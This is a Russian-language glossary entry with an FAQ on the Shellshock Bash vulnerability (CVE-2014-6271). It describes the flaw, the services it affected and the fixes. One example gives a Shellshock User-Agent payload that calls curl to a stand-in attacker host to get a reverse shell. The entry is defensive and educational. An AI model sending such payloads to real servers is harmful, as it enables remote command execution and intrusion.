Shellshock (CVE-2014-6271)
Что такое Shellshock (CVE-2014-6271)?
Shellshock (CVE-2014-6271)Уязвимость GNU Bash 2014 года, позволявшая выполнять произвольные команды через специально сконструированные переменные окружения, передаваемые в Bash другими программами.
Shellshock (CVE-2014-6271 и связанный CVE-2014-7169) — дефект разбора определений функций, хранящихся в переменных окружения GNU Bash: команды после тела функции выполнялись при запуске оболочки. Поскольку многие сервисы — CGI-скрипты, DHCP-клиенты, OpenSSH ForceCommand, qmail — вызывали Bash с переменными, контролируемыми атакующим, удалённая эксплуатация была тривиальной, часто от имени root. Раскрытие 2014 года вызвало глобальную волну патчей и массовую эксплуатацию ботнетами, веб-шеллами и червями. Исправление: обновить Bash до пропатченных версий, отказаться от устаревших Bash-CGI, применять эшелонированную защиту — снижение привилегий и ограничение передачи переменных окружения.
● Примеры
- 01
Отправка User-Agent: () { :; }; /bin/curl attacker.com на Bash-CGI endpoint для получения reverse shell.
- 02
Эксплуатация DHCP-клиента, передающего строки опций в окружение Bash-хука.
● Частые вопросы
Что такое Shellshock (CVE-2014-6271)?
Уязвимость GNU Bash 2014 года, позволявшая выполнять произвольные команды через специально сконструированные переменные окружения, передаваемые в Bash другими программами. Относится к категории Уязвимости в кибербезопасности.
Что означает Shellshock (CVE-2014-6271)?
Уязвимость GNU Bash 2014 года, позволявшая выполнять произвольные команды через специально сконструированные переменные окружения, передаваемые в Bash другими программами.
Как защититься от Shellshock (CVE-2014-6271)?
Защита от Shellshock (CVE-2014-6271) обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия Shellshock (CVE-2014-6271)?
Распространённые альтернативные названия: Bashdoor, CVE-2014-6271.